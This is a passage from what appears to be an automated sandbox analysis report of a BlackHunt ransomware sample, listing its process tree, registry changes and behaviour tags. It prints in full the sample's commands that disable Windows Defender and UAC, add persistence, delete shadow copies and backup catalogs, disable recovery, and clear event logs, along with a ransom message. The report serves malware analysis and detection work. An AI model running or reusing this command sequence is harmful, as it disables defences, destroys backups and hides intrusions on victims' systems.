to memory of 2916 4956 d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe 114 PID 3608 wrote to memory of 2620 3608 cmd.exe 111 PID 3608 wrote to memory of 2620 3608 cmd.exe 111 PID 4956 wrote to memory of 428 4956 d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe 113 PID 4956 wrote to memory of 428 4956 d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe 113 PID 4956 wrote to memory of 516 4956 d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe 115 PID 4956 wrote to memory of 516 4956 d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe 115 PID 4956 wrote to memory of 2236 4956 d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe 118 PID 4956 wrote to memory of 2236 4956 d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe 118 PID 4956 wrote to memory of 5052 4956 d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe 121 PID 4956 wrote to memory of 5052 4956 d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe 121 PID 2448 wrote to memory of 1924 2448 cmd.exe 120 PID 2448 wrote to memory of 1924 2448 cmd.exe 120 PID 2916 wrote to memory of 4508 2916 cmd.exe 123 PID 2916 wrote to memory of 4508 2916 cmd.exe 123 PID 428 wrote to memory of 3980 428 cmd.exe 182 PID 428 wrote to memory of 3980 428 cmd.exe 182 PID 4956 wrote to memory of 5028 4956 d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe 127 PID 4956 wrote to memory of 5028 4956 d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe 127 PID 516 wrote to memory of 264 516 cmd.exe 125 PID 516 wrote to memory of 264 516 cmd.exe 125 PID 4956 wrote to memory of 4052 4956 d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe 129 PID 4956 wrote to memory of 4052 4956 d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe 129 PID 872 wrote to memory of 2164 872 cmd.exe 128 PID 872 wrote to memory of 2164 872 cmd.exe 128 PID 2236 wrote to memory of 3476 2236 cmd.exe 131 PID 2236 wrote to memory of 3476 2236 cmd.exe 131 PID 4956 wrote to memory of 3580 4956 d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe 132 PID 4956 wrote to memory of 3580 4956 d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe 132 PID 5052 wrote to memory of 3792 5052 cmd.exe 134 PID 5052 wrote to memory of 3792 5052 cmd.exe 134 PID 4956 wrote to memory of 1320 4956 d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe 135 PID 4956 wrote to memory of 1320 4956 d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe 135 PID 5028 wrote to memory of 4704 5028 cmd.exe 137 PID 5028 wrote to memory of 4704 5028 cmd.exe 137 PID 4956 wrote to memory of 1680 4956 d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe 138 PID 4956 wrote to memory of 1680 4956 d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe 138 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe"C:\Users\Admin\AppData\Local\Temp\d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe"1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:4956 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3428 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:4684
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3012 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:2516
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4452 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:1060
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3668 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:4496
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2640 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:5032
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3608 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:2620
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:872 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:2164
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2448 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:1924
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:428 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:3980
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2916 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:4508
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:516 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:264
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2236 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:3476
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:5052 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:3792
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:5028 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:4704
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:4052
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:4968
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:3580
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:4416
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:1320
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:2804
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:1680
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:1116
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:2628
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:4988
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:4928
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:468
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:5116
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:5112
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:2420
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:4000
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:456
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:4040
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:2212
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:5104
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:4612
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:3344
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:3016
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:3388
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:3436
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:4876
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:2976
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:4072
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe" /F2⤵PID:3508
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe" /F3⤵
- Creates scheduled task(s)
PID:4268
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:3920
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:2360
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:528
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1312
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:3440
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:3912
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:1600
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3980
-
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:4968
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:4960
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:868
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:3640
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:7648
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:1400
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:8092
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:4852
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:8780
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:4360
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:7956
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:3448
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:7936
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:3124
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:7972
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:8104
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵
- Enumerates connected drives
PID:15232
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:3068
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:15216
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:2272
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:7524
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:8384
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2228
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:15176
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2572
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:12052
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:15356
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:3936
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:15292
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:4732
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:14968
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:5020
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:15140
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:9100
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:12824
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:9896
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:15012
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:10864
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:15036
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:10136
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:9432
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:10292
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:14484
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:9624
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:9652
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:15092
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:9556
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:15116
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:12772
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:12876
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:5896
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:15136
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:12816
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:14624
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:8484
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:14604
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8168
-
-
-
